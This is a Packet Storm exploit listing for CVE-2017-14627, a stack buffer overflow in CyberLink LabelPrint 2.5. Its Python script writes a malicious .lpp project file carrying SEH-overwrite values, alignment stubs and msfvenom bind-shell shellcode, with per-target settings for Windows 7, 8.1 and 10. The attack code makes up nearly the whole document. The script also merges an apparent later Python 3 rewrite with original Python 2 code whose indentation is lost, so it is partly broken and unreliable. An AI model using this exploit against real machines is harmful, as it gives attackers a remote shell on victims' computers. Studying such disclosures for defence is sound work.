
packetstormF3ciPACKETSTORM:144343

CyberLink LabelPrint Buffer Overflow

2017-09-2600:00:00
f3ci
packetstormsecurity.com
35

EPSS

0.563

Percentile

97.7%

#!/usr/bin/python  
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow  
# Date: September 23, 2017  
# Exploit Author: f3ci  
# Vendor Homepage: https://www.cyberlink.com/  
# Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe  
# Version: 2.5  
# Tested on: Windows 7x86, Windows8.1x64, Windows 10  
# CVE : CVE-2017-14627  
#   
# Note: CyberLink LabelPrint is bundled with the Power2Go application and is also preinstalled on most HP, Lenovo and Asus laptops.  
# This proof of concept is based on the LabelPrint 2.5 build that ships with the Power2Go installer above.  
  
def exp():  
header = ("\x3c\x50\x52\x4f\x4a\x45\x43\x54\x20\x76\x65\x72\x73\x69\x6f\x6e"  
"\x3d\x22\x31\x2e\x30\x2e\x30\x30\x22\x3e\x0a\x09\x3c\x49\x4e\x46"  
"\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x20\x74\x69\x74\x6c\x65\x3d\x22"  
"\x22\x20\x61\x75\x74\x68\x6f\x72\x3d\x22\x22\x20\x64\x61\x74\x65"  
"\x3d\x22\x37\x2f\x32\x34\x2f\x32\x30\x31\x37\x22\x20\x53\x79\x73"  
"\x74\x65\x6d\x54\x69\x6d\x65\x3d\x22\x32\x34\x2f\x30\x37\x2f\x32"  
"\x30\x31\x37\x22\x3e")  
filename2 = "labelprint_poc_universal.lpp"  
f = open(filename2,'w')  
junk = "A" * 790  
nseh = "\x61\x42"  
seh = "\x2c\x44"  
nop = "\x42"  
  
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python  
buf = ""  
buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"  
buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"  
buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"  
buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"  
buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"  
buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"  
buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"  
buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"  
buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"  
buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"  
buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"  
buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"  
buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"  
buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"  
buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"  
  
  
#preparing address for decoding  
ven = nop #nop/inc edx  
ven += "\x54" #push esp  
ven += nop #nop/inc edx  
ven += "\x58" #pop eax  
ven += nop #nop/inc edx  
ven += "\x05\x1B\x01" #add eax 01001B00 universal  
ven += nop #nop/inc edx  
ven += "\x2d\x01\x01" #sub eax 01001000  
ven += nop #nop/inc edx  
ven += "\x50" #push eax  
ven += nop #nop/inc edx  
ven += "\x5c" #pop esp  
  
#we need to encode the RET address, since C3 is bad char.  
#preparing ret opcode  
ven += nop #nop/inc edx  
ven += "\x25\x7e\x7e" #and eax,7e007e00  
ven += nop #nop/inc edx  
ven += "\x25\x01\x01" #and eax,01000100  
ven += nop #nop/inc edx  
ven += "\x35\x7f\x7f" #xor eax,7f007f00  
ven += nop #nop/inc edx  
ven += "\x05\x44\x44" #add eax,44004400  
ven += nop #nop/inc edx  
ven += "\x57" #push edi  
ven += nop #nop/inc edx  
ven += "\x50" #push eax  
ven += junk2 #depending OS  
  
#custom venetian   
ven += "\x58" #pop eax  
ven += nop #nop/inc edx  
ven += "\x58" #pop eax  
ven += nop #nop/inc edx  
ven += align #depending OS  
ven += nop #nop/inc edx  
ven += "\x2d\x01\x01" #add eax, 01000100 #align eax to our buffer  
ven += nop #nop/inc edx  
ven += "\x50" #push eax  
ven += nop #nop/inc edx  
  
#call esp 0x7c32537b MFC71U.dll  
ven += "\x5C" #pop esp  
ven += nop #nop/inc edx  
ven += "\x58" #pop eax  
ven += nop #nop/inc edx  
ven += "\x05\x53\x7c" #add eax 7c005300 part of call esp  
ven += nop #nop/inc edx  
ven += "\x50" #push eax  
ven += junk1 #depending OS  
ven += "\x7b\x32" #part of call esp  
  
#preparing for shellcode  
ven += nop * 114 #junk  
ven += "\x57" #push edi  
ven += nop #nop/inc edx  
ven += "\x58" #pop eax  
ven += nop #nop/inc edx  
ven += align2 #depending OS  
ven += nop #nop/inc edx  
ven += "\x2d\x01\x01" #sub eax,01000100  
ven += nop #nop/inc edx  
ven += buf #shellcode  
  
sisa = nop * (15000-len(junk+nseh+seh+ven))  
payload = junk+nseh+seh+ven+sisa  
bug="\x09\x09\x3c\x54\x52\x41\x43\x4b\x20\x6e\x61\x6d\x65\x3d"+'"'+payload+'"'+"/>\n"  
bug+=("\x09\x3c\x2f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x3e\x0a"  
"\x3c\x2f\x50\x52\x4f\x4a\x45\x43\x54\x3e")  
f.write(header+ "\n" + bug)  
  
print "[+] File", filename2, "successfully created!"  
print "[*] Now open project file", filename2, "with CyberLink LabelPrint."  
print "[*] Good luck ;)"  
f.close()  
  
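# Per-target constants.  Only the two alignment immediates and the two padding
# lengths differ between targets; the rest of the payload is shared (see exp()).
# Each alignment stub is a Unicode "add eax, imm32": the three bytes widen to
# 05 00 XX 00 01 00, i.e. add eax, 0x0100XX00.
TARGETS = {
    1: {
        "label": "Windows 7 x86 bindshell on port 4444",
        "align": "\x05\x09\x01",      # add eax, 0x01000900
        "align2": "\x05\x0A\x01",     # add eax, 0x01000A00
        "junk1": "\x42" * 68,
        "junk2": "\x42" * 893,
    },
    2: {
        "label": "Windows 8.1 x64 bindshell on port 4444",
        "align": "\x05\x09\x01",      # add eax, 0x01000900
        "align2": "\x05\x0A\x01",     # add eax, 0x01000A00
        "junk1": "\x42" * 116,
        "junk2": "\x42" * 845,
    },
    3: {
        "label": "Windows 10 x64 bindshell on port 4444",
        "align": "\x05\x05\x01",      # add eax, 0x01000500
        "align2": "\x05\x06\x01",     # add eax, 0x01000600
        "junk1": "\x42" * 136,
        "junk2": "\x42" * 313,
    },
}


def _read_choice(prompt):
    """Prompt on stdin and return the reply as an int, or None if it is not one.

    The original used Python 2's ``input()``, which *evaluates* whatever is
    typed; the raw string is read instead and converted explicitly.  EOF on
    stdin is treated like an invalid choice rather than a crash.
    """
    try:
        ask = raw_input        # Python 2: returns the raw string
    except NameError:
        ask = input            # Python 3: input() already returns the raw string
    try:
        reply = ask(prompt)
    except EOFError:
        return None
    try:
        return int(reply.strip())
    except ValueError:
        return None


def main():
    """Print the banner, ask for a target and write the PoC project file.

    The selected target's constants are published as the module globals
    ``align``, ``align2``, ``junk1`` and ``junk2`` because ``exp()`` reads them
    from there; ``exp()`` is then called without arguments.
    """
    global align, align2, junk1, junk2

    print("[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->")
    print("[*] by f3ci & modpr0be <research[at]spentera.id>")
    print("[*] <------------------------------------------------->\n")
    for number in sorted(TARGETS):
        print("\t%d.%s" % (number, TARGETS[number]["label"]))
    print("")

    target = TARGETS.get(_read_choice("Choose Target OS : "))
    if target is None:
        print("Choose the right one :)")
        return

    align, align2 = target["align"], target["align2"]
    junk1, junk2 = target["junk1"], target["junk2"]
    # The original swallowed every exception here with a bare except; only the
    # file-write failure is an expected error, so only that is reported.
    try:
        exp()
    except (IOError, OSError) as err:
        print("[-] Could not write the project file: %s" % err)


if __name__ == "__main__":
    main()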
  
